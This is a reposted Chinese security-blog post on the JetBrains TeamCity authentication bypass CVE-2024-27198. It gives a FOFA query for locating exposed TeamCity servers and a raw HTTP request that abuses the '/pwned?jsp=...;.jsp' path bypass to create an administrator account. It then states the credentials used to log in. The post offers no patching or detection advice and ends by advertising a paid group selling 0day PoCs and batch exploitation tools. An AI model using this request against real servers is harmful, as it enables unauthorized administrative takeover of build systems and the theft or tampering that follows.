【JetBrains TeamCity 身份验证绕过[CVE-2024-27198]】
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/4-1710524256.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
资产测绘
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/1-1710524256.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
FOFA: body="Log in to TeamCity"![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/10-1710524257.jpeg "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/4-1710524257.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
数据请求包
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/5-1710524257.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1Host: youipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: */*Content-Type: application/jsonAccept-Encoding: gzip, deflate
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/9-1710524258.png "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/4-1710524259.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
访问地址
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/1-1710524259.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
使用账号密码qqwweerr1/qqwweerr登录系统
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/0-1710524260.jpeg "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/6-1710524260.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
漏洞利用
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/0-1710524261.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/1-1710524262.png "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/10-1710524263.png "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
圈子介绍
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/10-1710524263.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/9-1710524264.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
【圈子介绍】
高质量漏洞利用工具分享社区,每天至少更新一个0Day/Nday/1day及对应漏洞的批量利用工具,团队内部POC分享,星球不定时更新内外网攻防渗透技巧以及最新学习研究成果等。分享行业最新资讯,交流解答各类技术问题
【圈子服务】
1,一年至少365+漏洞Poc及对应漏洞批量利用工具
2,24HVV内推途径(直面厂商)
3,Fofa高级会员api及各种漏洞利用工具及后续更新,渗透工具、文档资源分享
4,内部漏洞库情报分享(目前已有850+poc,会定期更新,包括部分未公开0/1day)
5,加入内部微信群,认识更多的行业朋友(群里有100+C**D通用证书师傅),遇到任何技术问题都可以进行快速提问、讨论交流;
圈子目前价格为59元(交个朋友啦!),现在星球有近300+位师傅相信选择加入我们圈子,圈子每天都会更新内容。
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/9-1710524264.png "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/1-1710524264.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
圈子收集近期LD库
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/5-1710524264.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/8-1710524266.png "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/6-1710524266.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
免责声明
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/7-1710524266.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
![JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]](http://cn-sec.com/wp-content/uploads/2024/03/8-1710524267.gif "JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]")
文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
原文始发于微信公众号(银遁安全团队):JetBrains_TeamCity 身份验证绕过漏洞[CVE-2024-27198]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论